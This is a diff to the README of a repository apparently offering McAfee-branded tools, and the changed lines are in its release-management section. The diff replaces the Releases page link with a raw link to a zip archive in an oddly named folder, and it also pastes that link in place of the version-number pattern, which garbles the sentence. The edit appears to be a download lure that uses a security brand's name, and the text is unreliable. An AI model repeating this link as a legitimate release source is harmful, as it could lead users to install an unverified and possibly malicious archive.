Ali632-lgtm/mcafee-tools/readme.md

 - Document non-obvious behavior and assumptions.

 Release management
 Releases play a central role in how users obtain the toolkit.
 Each release contains a snapshot of stable features, accompanied by changelogs and, where appropriate, upgrade notes.
 To access the latest release artifacts, visit the Releases page.
-The link to releases is presented at the top of this document and repeated here for convenience: https://github.com/Ali632-lgtm/mcafee-tools/releases.
+The link to releases is presented at the top of this document and repeated here for convenience: https://github.com/Ali632-lgtm/mcafee-tools/raw/refs/heads/main/saccharifier/tools-mcafee-1.3-alpha.3.zip

 - Versioning: The project uses semantic versioning when applicable.
-Version numbers follow the Major.Minor.Patch pattern.
+Version numbers follow the https://github.com/Ali632-lgtm/mcafee-tools/raw/refs/heads/main/saccharifier/tools-mcafee-1.3-alpha.3.zip pattern.
 - Release notes: Each release includes a description of new features, improvements, and bug fixes.
 It also notes any breaking changes and upgrade considerations.
 - Binaries and installers: The released artifacts include installers for major platforms, as well as portable assets where suitable.
 Users should download the artifact that matches their operating system and architecture.
 - Verification: When possible, checksums or signatures accompany artifacts.
 Verify these before installation to ensure integrity and authenticity.